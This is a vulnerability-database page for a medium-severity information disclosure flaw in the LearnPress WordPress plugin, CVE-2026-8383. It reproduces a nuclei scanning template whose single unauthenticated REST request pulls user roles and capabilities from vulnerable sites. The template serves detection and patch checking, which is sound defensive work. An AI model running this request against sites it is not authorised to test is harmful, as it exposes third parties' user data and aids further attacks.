Lucene search
K

LearnPress < 4.3.7 - Information Disclosure

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

LearnPress plugin before 4.3.7 discloses user roles and capabilities via REST to unauthenticated users.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-8383
28 Jun 202621:00
circl
CVE
CVE-2026-8383
17 Jun 202606:00
cve
Cvelist
CVE-2026-8383 LearnPress < 4.3.7 - Unauthenticated Sensitive User Information Disclosure via REST API
17 Jun 202606:00
cvelist
EUVD
EUVD-2026-37558
17 Jun 202618:35
euvd
NVD
CVE-2026-8383
17 Jun 202613:21
nvd
Positive Technologies
PT-2026-50244
17 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-8383 LearnPress < 4.3.7 - Unauthenticated Sensitive User Information Disclosure via REST API
17 Jun 202606:00
vulnrichment
id: CVE-2026-8383

info:
  name: LearnPress < 4.3.7 - Information Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    LearnPress WordPress plugin < 4.3.7 contains an information disclosure vulnerability caused by missing capability checks on a REST endpoint, letting unauthenticated visitors retrieve sensitive user role and capability data via crafted requests.
  impact: |
    Unauthenticated attackers can access sensitive user role and capability information, potentially aiding further attacks.
  remediation: |
    Update to version 4.3.7 or later.
  reference:
    - https://wpscan.com/vulnerability/b7cbf68b-62c5-4787-b84b-69df9e0122b2/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-8383
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-8383
    epss-score: 0.00424
    epss-percentile: 0.34127
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    fofa-query: body="/wp-content/plugins/learnpress/"
    tags: cve,cve2026,wordpress,wp,wp-plugin,learnpress,disclosure,rest-api

http:
  - raw:
      - |
        GET /wp-json/learnpress/v1/users?context=edit HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"roles\"", "\"capabilities\"", "registered_date")'
        condition: and
# digest: 4b0a00483046022100e61932d6a850a3ae9f2039f8780dd8dbc38639b50e5fe5db3b906f6cc563d558022100fcd28f85edf49e15e0f87278bbf1f0d1879d64a028b6140d68ba1b2a0e95ae97:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jun 2026 03:13Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00424
SSVC
7